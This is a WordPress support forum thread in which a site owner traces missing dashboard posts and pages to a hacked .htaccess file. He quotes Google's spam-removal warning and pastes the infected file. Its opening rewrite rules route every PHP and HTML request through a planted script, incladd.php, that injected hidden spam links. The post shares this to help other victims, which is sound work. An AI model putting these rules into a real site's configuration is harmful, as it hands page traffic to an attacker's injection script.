WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] HELP! No posts found & No pages found. (6 posts)

  1. techhead
    Member
    Posted 5 years ago #

    Hi,

    I really hope someone can help me.

    I have been running WP 2.7.1 quite happily without any problems but all of a sudden have started getting the following errors when I go to 'Edit' either Pages or Posts within my WP Deshboard:

    No posts found
    No pages found

    Despite these error messages I can still see my 180 posts and 10 pages when accessing my WP site. Also when I go to try and edit either a post or page via the WP dashboard it is displaying that there is this number of posts/pages though it is just not displaying them and instead giving the error message described above.

    I have tried the following to try resolve the issue though with no luck:

    - Disabled all my plugins.
    - I have installed the WP-DBManager plug in and have run a repair against my WP database.
    - I have also run a repair against the WP database using PHPMyAdmin.
    - I have cleared the cache of my browser and have tried different browsers on 2 different PCs.

    Any help or ideas on how to resolve this would be much appreciated.

    Thank you in advance. :)

    Simon

  2. techhead
    Member
    Posted 5 years ago #

    Hi all,

    I discovered what the issue was. My .htaccess file had been compromised with some re-direction code which injected a large number of hidden links into my pages.

    I only picked up on this as I recieved the following email from Google:

    While we were indexing your webpages, we detected that some of your pages were using techniques that are outside our quality guidelines, which can be found here: http://www.google.com/support/webmasters/bin/answer.py?answer=35769&hl=en. This appears to be because your site has been modified by a third party. Typically, the offending party gains access to an insecure directory that has open permissions. Many times, they will upload files or modify existing ones, which then show up as spam in our index.

    The following is some example hidden text we found at <WebSite URL inserted here>

    between coke zero diet coke kosher passover coke in the coconut coke why is coke better than diet coke mentos video diet coke 2007 publishing a podcast on coke mentos girl codes from coke

    In order to preserve the quality of our search engine, pages from techhead.co.uk are scheduled to be removed temporarily from our search results for at least 30 days.

    We would prefer to keep your pages in Google's index. If you wish to be reconsidered, please correct or remove all pages (may not be limited to the examples provided) that are outside our quality guidelines. One potential remedy is to contact your web host technical support for assistance. For more information about security for webmasters, see http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html. When such changes have been made, please visit https://www.google.com/webmasters/tools/reconsideration?hl=en to learn more and submit your site for reconsideration.

    I had checked my blog postings in the WordPress database using PHPAdmin though these links didn't appear in the content (luckily) so I knew it had to be injected somewhere.

    Anyway I rolled back to my .htaccess file from a week ago which was minus the rogue lines of redirection commands/syntax and all was well with the world again.

    I am now going to go and find out the best way to ensure my WordPress install is locked down.

    Here's the content of my 'violated' .htaccess file:

    Options +FollowSymLinks

    RewriteEngine On
    RewriteCond /home/sites/techhead.co.uk/public_html//_files/incladd.php -f
    RewriteCond %{REQUEST_URI} !incladd.php$
    RewriteCond %{REQUEST_URI} !166df7.php$
    RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /_files/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]

    # BEGIN WPSuperCache
    <IfModule mod_rewrite.c>
    RewriteBase /
    AddDefaultCharset UTF-8
    RewriteCond %{REQUEST_METHOD} !=POST
    RewriteCond %{QUERY_STRING} !.*=.*
    RewriteCond %{HTTP:Cookie} !^.*(comment_author_|wordpress|wp-postpass_).*$
    RewriteCond %{HTTP:Accept-Encoding} gzip
    RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html.gz -f
    RewriteRule ^(.*) /wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html.gz [L]
    RewriteCond %{REQUEST_METHOD} !=POST
    RewriteCond %{QUERY_STRING} !.*=.*
    RewriteCond %{HTTP:Cookie} !^.*(comment_author_|wordpress|wp-postpass_).*$
    RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html -f
    RewriteRule ^(.*) /wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html [L]
    </IfModule>
    # END WPSuperCache
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    Hope this helps someone else outthere.

    Cheers,

    Simon

  3. techhead
    Member
    Posted 5 years ago #

    I forgot to mention - this resolved the issue with the rogue links being injected into my WP pages and I can now list and edit the Pages and Posts via the web interface.

  4. mc96051
    Member
    Posted 5 years ago #

    Had a similar problem running 2.6. The database was corrupted:

    userid_wrdp2.wp_posts warning : Table is marked as crashed error : Checksum for key: 3 doesn't match checksum for records error : Corrupt

  5. mc96051
    Member
    Posted 5 years ago #

    solved it with my hosting provider.

  6. Jay Collier
    Member
    Posted 4 years ago #

    FYI, in case anyone else visits this post, this symptom also occurred to me with The Events Calendar plugin when activated sitewide in MU.

Topic Closed

This topic has been closed to new replies.

About this Topic